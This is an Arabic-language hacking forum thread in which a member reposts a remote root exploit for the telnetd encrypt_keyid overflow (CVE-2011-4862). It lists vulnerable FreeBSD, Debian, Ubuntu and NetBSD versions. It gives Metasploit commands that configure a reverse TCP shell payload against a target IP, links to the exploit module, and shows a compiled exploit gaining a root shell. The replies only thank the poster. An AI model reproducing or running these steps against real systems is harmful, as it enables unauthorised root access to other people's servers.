نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 12/02/2012, 17:45   المشاركة رقم: 1
المعلومات
الكاتب:
 cold  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية cold

البيانات
التسجيل : Apr 2010
العضوية : 57
الاهتمامات : hack
الإقامة : dz
المواضيع : 41
الردود : 39
المجموع : 80
بمعدل : 0.01 يوميا
الاختراقات : [dz4all]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 26/08/2015/00:29
سبب الغياب : bb
معدل التقييم: 17
نقاط التقييم: 11
cold is on a distinguished road
شكراً: 30
تم شكره 55 مرة في 33 مشاركة

 Algeria


الإتصالات
الحالة:
cold غير متواجد حالياً
وسائل الإتصال:

افتراضي Telnetd encrypt_keyid Remote Root

[]


الملف المصاب
encrypt.c

CVE-2011-4862

بداية نبدء بى

[] [] Overflow

Exploit Targets


FreeBSD 8.2
2 - FreeBSD 8.1
3 - FreeBSD 8.0
4 - FreeBSD 7.3/7.4
5 - FreeBSD 7.0/7.1/7.2
6 - FreeBSD 6.3/6.4
7 - FreeBSD 6.0/6.1/6.2
8 - FreeBSD 5.5
9 - FreeBSD 5.3

بستخدام ال metasploit


كود:
$ msfconsole                  ##                          ###           ##    ##  ##  ##  #### ###### ####  #####   #####    ##    ####        ###### ####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ## ####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ## ## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ## ##   ##  #### ###   #####   #####     ##   ####   ####   #### ###                                       ##  msf > use exploit/freebsd/telnet/telnet_encrypt_keyid  msf exploit(telnet_encrypt_keyid) > show payloads msf exploit(telnet_encrypt_keyid) > set PAYLOAD generic/shell_reverse_tcp msf exploit(telnet_encrypt_keyid) > set LHOST [MY IP ADDRESS] msf exploit(telnet_encrypt_keyid) > set RHOST [TARGET IP] msf exploit(telnet_encrypt_keyid) > exploit
المديل

كود:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
وها كذالك

كود بلغة HTML:
http://www.securityfocus.com/bid/51182/exploit

بنسبة لى

[] Root


Exploit Targets

Ubuntu GNU/Linux 10.04, Inetutils Server (i386)
Ubuntu GNU/Linux 10.04, Heimdal Server (i386)
Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)
Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)
Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)
Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)
FreeBSD 8.0 (i386)
FreeBSD 8.1 (i386)
FreeBSD 8.2 (i386)
NetBSD 5.1 (i386)

كود:
gcc exploit.c -o exploit ./exploit 127.0.0.1 23 1 [<] Succes reading intial server request 3 bytes [>] Telnet initial encryption mode and IV sent [<] Server response: 8 bytes read [>] First payload to overwrite function pointer sent [<] Server response: 6 bytes read [>] Second payload to triger the function pointer[*] got shell? uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)






منقول للفايده

سسلام*/







آخر مواضيع » cold

عرض البوم صور cold   رد مع اقتباس
2 أعضاء قالوا شكراً لـ cold على المشاركة المفيدة:
ApOcalYpse (12/02/2012), Dz.kH4 (12/02/2012)
قديم 04/01/2013, 00:47   المشاركة رقم: 2
المعلومات
الكاتب:
 gholoom  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
gholoom غير متواجد حالياً
وسائل الإتصال:

يعطيك ربى آلعآفية

عرض البوم صور gholoom   رد مع اقتباس
قديم 21/03/2013, 01:13   المشاركة رقم: 3
المعلومات
الكاتب:
 SATLAM  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
SATLAM غير متواجد حالياً
وسائل الإتصال:

جزاك الله خيرا

عرض البوم صور SATLAM   رد مع اقتباس
قديم 22/03/2013, 03:00   المشاركة رقم: 4
المعلومات
الكاتب:
 SATLAM  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
SATLAM غير متواجد حالياً
وسائل الإتصال:

بارك الله في

عرض البوم صور SATLAM   رد مع اقتباس
قديم 24/10/2013, 13:23   المشاركة رقم: 5
المعلومات
الكاتب:
 ذاكريف  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ذاكريف غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك موضوع جميل جدا

عرض البوم صور ذاكريف   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 27
3b6 , abu-wissam , ApOcalYpse , BELHADJ47 , cold , الديلر الفلسطيني , Dr@S!L3NT H!LL , Dz.kH4 , ذاكريف , elouldja , gholoom , Gomina7 , kanoticx , love511 , mehdi_dz , Mr.Inj3ct0r , NuevoAsesino , SaBeR-Dz , sanfour25 , SATLAM , sko0or , Smail002 , sniffer , somar hacker , V!rù$ No!r , ViRuS_Ra3cH , wassar
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[remote exploits] - Telnetd encrypt_keyid: Remote Root function pointer overwrite ADMINISTRATOR قسم الثغرات 0 27/12/2011 13:40
[remote exploits] - DreamBox DM800 1.5rc1 Remote Root File Disclosure Exploit ADMINISTRATOR قسم الثغرات 0 26/11/2011 14:00
[remote exploits] - Bison FTP Server v3.5 Multiple Remote Root BOF Exploit (MSF) ADMINISTRATOR قسم الثغرات 0 04/09/2011 16:30
[remote exploits] - HP Data Protector Remote Root Shell for Linux ADMINISTRATOR قسم الثغرات 0 10/08/2011 11:27
[remote exploits] - ProFTPD 1.3.3c compromised source remote root Trojan ADMINISTRATOR قسم الثغرات 0 02/12/2010 20:50

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 23:44.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115